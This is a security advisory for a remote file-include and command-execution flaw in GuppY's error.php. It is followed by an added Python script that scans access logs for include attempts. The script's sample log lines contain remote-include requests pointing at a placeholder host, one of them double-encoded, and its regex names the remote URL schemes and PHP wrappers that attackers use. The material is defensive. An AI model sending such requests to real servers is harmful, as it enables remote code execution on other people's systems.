GuppY Error.PHP Remote File Include and Command Execution Vulnerability

GuppY is prone to a remote file-include vulnerability and to a command-execution vulnerability.

The software fails to properly sanitize data supplied to the 'error.php' script, allowing attackers to specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.

An attacker can also pass malicious PHP commands through this script to be executed on an affected server, which could facilitate unauthorized access as well.

GuppY 4.5.16 and prior versions are vulnerable.
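
A defender-side check for the file-include issue described above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to error.php in which any query parameter value begins with a remote URL scheme or PHP stream wrapper, after undoing nested percent-encoding. The advisory does not name the affected parameter, so the parameter name `param`, the paths, the hosts and the log lines below are constructed placeholders, and the Combined Log Format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of an access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Schemes and wrappers through which a PHP include can load code from outside the site.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect):', re.I)

# Constructed sample lines (not real traffic); "param" is a placeholder name.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2010:10:01:02 +0000] "GET /guppy/error.php?param=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Mar/2010:10:01:09 +0000] "GET /guppy/error.php?param=%2568ttp%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2010:10:02:00 +0000] "GET /guppy/error.php?param=404 HTTP/1.1" 200 901',
    '198.51.100.7 - - [12/Mar/2010:10:02:05 +0000] "GET /guppy/other.php?param=http://example.invalid/x.txt HTTP/1.1" 200 77',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp -> %68ttp -> http)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line, script="error.php"):
    """Return [(name, decoded_value)] for parameters of `script` that point at a remote resource."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if target.path.rsplit("/", 1)[-1].lower() != script:
        return []
    hits = []
    # parse_qsl decodes once; fully_decode removes any further encoding layers.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = fully_decode(value)
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every line with at least one suspicious parameter."""
    results = [(n, suspicious_params(line)) for n, line in enumerate(lines, 1)]
    return [(n, hits) for n, hits in results if hits]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(lineno, hits)
```

The check matches on the script name and on any parameter, so it keeps working whichever parameter the vulnerable code reads; it covers the file-include path only, not the command-execution issue.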


 

Copyright 2010, SecurityFocus